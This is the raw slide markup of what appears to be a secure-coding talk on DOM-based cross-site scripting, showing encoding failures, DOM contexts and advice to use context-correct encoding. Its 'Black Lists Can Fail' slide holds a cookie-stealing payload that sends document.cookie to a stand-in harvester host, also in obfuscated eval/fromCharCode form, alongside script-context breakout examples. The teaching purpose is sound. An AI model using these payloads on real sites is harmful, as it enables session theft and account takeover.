              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exploit)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dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>JSEncodedInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>%&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="33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3300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>x = “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&lt;/script&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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attack_code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()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&lt;/script&gt;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&lt;script&gt;//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1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1800" b="1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1400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14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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="#" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>JSEncodedInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>%&gt;" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="14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800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="#" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\”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onblur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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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attack_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>() x=\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Encoding Fail #3 (Auto Reverse Escaping at Runtime)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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="#" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>jsfunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bean:write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> property="val1" /&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)" &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>javascript:jsfunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’</a:t>
            </a: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&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>URLEncoder.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>req.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("input"))%&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>);" &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bean:write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> property="val1" /&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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5705693" y="1847374"/>
            <a:ext cx="1914307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sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, ", &lt;, &gt;, &amp;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Up Arrow Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="5562600"/>
            <a:ext cx="1914307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sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, ", &lt;, &gt;, &amp;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Up Arrow Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3770471"/>
            <a:ext cx="6324600" cy="801529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 err="1" smtClean="0"/>
              <a:t>alphaNumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> stay same as well as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>. _ * -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Encoding Fail #4 (Reverse Encoding upon DOM retrieval)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&lt;form name="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formName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"  &gt;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&lt;input id="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user_in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" value="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&lt;c:out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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800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&lt;%=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req.getParameter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("input")%&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800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/&gt;" /&gt;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user_in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').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6010493" y="2914174"/>
            <a:ext cx="1914307" cy="895826"/>
          </a:xfrm>
          <a:prstGeom prst="upArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 26650"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 64977"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, ", &lt;, &gt;, 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Black Lists Can Fail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stolenCookie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document.cookie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=http://www.cookierHarvester.com/cookiereader.php?cookie=" +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stolenCookie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"/&gt;");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or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eval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String.fromCharCode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 118,97,114,32,115,116,111,108,101,110,67,111,111,107,105,101,32,61,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,8220,60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,111,111,107,105,101,114,72,97,114,118,101,115,116,101,114,46,99,111,109,47,99,111,111,107,105,101,114,101,97,100,101,114,46,112,104,112,63,99,111,111,107,105,101,61,8221,32,43,32,99,111,111,107,105,101,32,43,32,8220,47,62,8221,41,59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Just need ( ) . and comma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76200"/>
            <a:ext cx="5486400" cy="457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Review of DOM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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219" b="2219"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1792288" y="53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type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4724400"/>
            <a:ext cx="7315200" cy="16764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window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[0]. i1.value = “Bob”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>ocument.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(“i1”).value = “Bob”;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the correct encoding for the DOM Context you are placing data into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Understand the characters encoded by the library you are using and how they apply to your context and the surrounding contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using the wrong encoding may still leave your app exploitable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read the DOM XSS Cheat Sheet:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet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Questions and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Special Thanks to Jim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Manico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WhiteHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jacob West (Fortify), Brian Chess (Fortify), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Hayes, Stefano Di Paola (Minded Security), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Achim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Hoffman, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RSnake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Mario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Heiderich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John Stevens (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cigital</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), Mike Samuel (Google), Arian Evans (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WhiteHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Himanshu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Dwivedi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Alex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stamos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Partners)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What’s Old is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19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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>DIV id=“div1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>CONTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;/DIV&gt;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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“div1”).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>= input;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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>id=“a1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>URL CONTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;Test&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“a1”).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>= input;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&lt;style&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS CONTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/style&gt;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&lt;div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS CONTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>document.body.style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>= input;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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>id=“a2” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="#" </a:t>
            </a:r>
            <a:r>
